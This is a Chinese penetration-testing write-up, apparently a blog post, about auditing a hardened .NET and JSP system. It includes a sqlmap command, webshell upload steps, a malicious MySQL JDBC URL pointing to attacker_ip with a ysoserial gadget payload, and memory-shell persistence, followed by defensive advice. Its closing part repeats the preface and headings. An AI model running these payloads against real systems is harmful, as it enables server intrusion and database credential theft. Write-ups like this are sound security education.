渗透测试实战：从漏洞挖掘到代码审计<\/h1>

前言<\/h2>
本文记录了一次针对已加固系统的渗透测试过程，通过代码审计发现新的漏洞点，最终获取服务器及数据库权限。案例涉及.NET和JSP系统，包含SQL注入、文件上传、MySQL JDBC反序列化等漏洞利用技术。<\/p>

案例背景<\/h2>

目标系统：已测试过一轮并经过加固修复的.NET和JSP系统<\/li>
测试要求：必须产出高危漏洞并获取服务器及数据库权限<\/li>

挑战：常规漏洞点已被修复，需要深入审计发现新的攻击面<\/li> <\/ul>

.NET系统漏洞利用<\/h2>

SQL注入漏洞<\/h3>

漏洞点<\/strong>：<\/p>

后台用户查询功能存在SQL注入<\/li>
参数：UserID = 1 + or + 1 = 1<\/code> 和 UserID = 1 + or + 1 = 2<\/code> 测试成功<\/li> <\/ul> 利用方法<\/strong>：<\/p> 使用SqlMap工具自动化注入： sqlmap -u "http:\/\/target.com\/page.aspx?UserID=1" --dbs <\/code><\/pre> <\/li> <\/ol> 文件上传漏洞<\/h3> 漏洞点<\/strong>：<\/p> 头像上传功能未做任何过滤<\/li> 可直接上传webshell获取服务器权限<\/li> <\/ul> 利用过程<\/strong>：<\/p> 上传aspx webshell文件<\/li> 通过webshell访问web.config文件<\/li> 获取多个数据库配置信息<\/li> <\/ol> JSP系统代码审计与漏洞挖掘<\/h2> 审计思路<\/h3> 系统之前已被挖掘过任意文件上传漏洞<\/li> 后台常规上传点已被修复<\/li> 通过指纹特征获取系统源码<\/li> 推测开发人员可能只修复了已知漏洞点而非全局修复<\/li> <\/ol> 任意文件上传漏洞<\/h3> 漏洞代码分析<\/strong>：<\/p> \/\/ 前端获取uploadPath值 <\/span><\/span><\/span>\/\/ 获取文件后缀未进行检查 <\/span><\/span><\/span><\/span>extName =<\/span> name.<\/span>substring<\/span>(<\/span>name.<\/span>lastIndexOf<\/span>(<\/span>"."<\/span>));<\/span> <\/span><\/span> <\/span><\/span>\/\/ 用时间戳+随机数字对文件重命名 <\/span><\/span><\/span><\/span>name +<\/span> (<\/span>int<\/span>)(<\/span>Math.<\/span>random<\/span>()*<\/span>90000<\/span> +<\/span> 10000<\/span>)<\/span> <\/span><\/span> <\/span><\/span>\/\/ 直接进行文件路径拼接 <\/span><\/span><\/span><\/span>new<\/span> File(<\/span>savePath +<\/span> name +<\/span> extName)<\/span> <\/span><\/span> <\/span><\/span>\/\/ 写入文件内容 <\/span><\/span><\/span><\/span>item.<\/span>write<\/span>(<\/span>file);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 响应返回上传成功的文件名（无具体路径） <\/span><\/span><\/span><\/span>response.<\/span>getWriter<\/span>().<\/span>print<\/span>((<\/span>name.<\/span>trim<\/span>()<\/span> +<\/span> extName.<\/span>trim<\/span>()).<\/span>trim<\/span>());<\/span> <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> uploadPath<\/code>值决定了文件存储目录且需要可访问权限<\/li> 由于系统曾被入侵过，可推测存在可访问的目录路径<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 构造上传HTML文件，设置uploadPath<\/code>为已知可访问目录（如\/aaa\/bbbb\/<\/code>）<\/li> 上传webshell文件<\/li> 根据返回的文件名访问webshell<\/li> <\/ol> MySQL JDBC反序列化漏洞<\/h3> 漏洞发现<\/strong>：<\/p> 某JSP文件中存在数据库连接功能<\/li> URL、用户名、密码完全可控<\/li> lib包中存在可利用的MySQL连接器<\/li> <\/ul> 漏洞代码分析<\/strong>：<\/p> \/\/ 不同数据库对应不同的type选择不同的数据库驱动 <\/span><\/span><\/span>\/\/ 这是一个数据库链接测试页面，参数完全可控 <\/span><\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p> MySQL 5.x版本<\/li> 存在Commons Beanutils(cc\/cb)依赖<\/li> <\/ul> 利用方法<\/strong>：<\/p> 构造恶意MySQL连接URL： jdbc:mysql:\/\/attacker_ip:3307\/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor <\/code><\/pre> <\/li> 设置用户名和密码： username = yso - CommonsBeanutils2 - raw_cmd : calc.exe password = 123456 <\/code><\/pre> <\/li> 攻击者服务器开启恶意MySQL服务<\/li> <\/ol> 本地测试<\/strong>：<\/p> 使用cb2链弹计算器验证漏洞有效性<\/li> <\/ul> 内存马注入<\/h3> 利用方法<\/strong>：<\/p> 使用JMG工具生成内存马class文件<\/li> 通过已获取的webshell上传并加载内存马<\/li> 实现持久化后门<\/li> <\/ol> 防御建议<\/h2> 文件上传防护<\/strong>：<\/p> 严格校验文件后缀和内容<\/li> 使用白名单机制限制可上传文件类型<\/li> 文件重命名时保持后缀不变<\/li> 上传目录设置为不可执行<\/li> <\/ul> <\/li> SQL注入防护<\/strong>：<\/p> 使用预编译语句<\/li> 实施最小权限原则<\/li> 对输入参数进行严格过滤<\/li> <\/ul> <\/li> 反序列化防护<\/strong>：<\/p> 更新MySQL连接器到最新版本<\/li> 限制JDBC连接参数配置<\/li> 使用安全版本的依赖库<\/li> <\/ul> <\/li> 代码审计建议<\/strong>：<\/p> 修复漏洞时应全局检查类似功能点<\/li> 实施安全的编码规范<\/li> 定期进行安全审计和渗透测试<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 本案例展示了如何通过深入代码审计在已加固系统中发现新的安全漏洞。关键点包括：<\/p> 开发人员往往只修复已知漏洞点而非全局修复<\/li> 系统历史漏洞信息可帮助推测当前配置<\/li> 数据库连接测试功能可能成为攻击入口<\/li> 文件上传功能的实现细节决定其安全性<\/li> <\/ol> 通过综合利用这些漏洞，最终实现了从外网渗透到获取服务器和数据库权限的全过程。<\/p>

渗透测试实战：从漏洞挖掘到代码审计<\/h1>

前言<\/h2> 本文记录了一次针对已加固系统的渗透测试过程，通过代码审计发现新的漏洞点，最终获取服务器及数据库权限。案例涉及.NET和JSP系统，包含SQL注入、文件上传、MySQL JDBC反序列化等漏洞利用技术。<\/p>

.NET系统漏洞利用<\/h2>

JSP系统代码审计与漏洞挖掘<\/h2>

前言<\/h2>
本文记录了一次针对已加固系统的渗透测试过程，通过代码审计发现新的漏洞点，最终获取服务器及数据库权限。案例涉及.NET和JSP系统，包含SQL注入、文件上传、MySQL JDBC反序列化等漏洞利用技术。<\/p>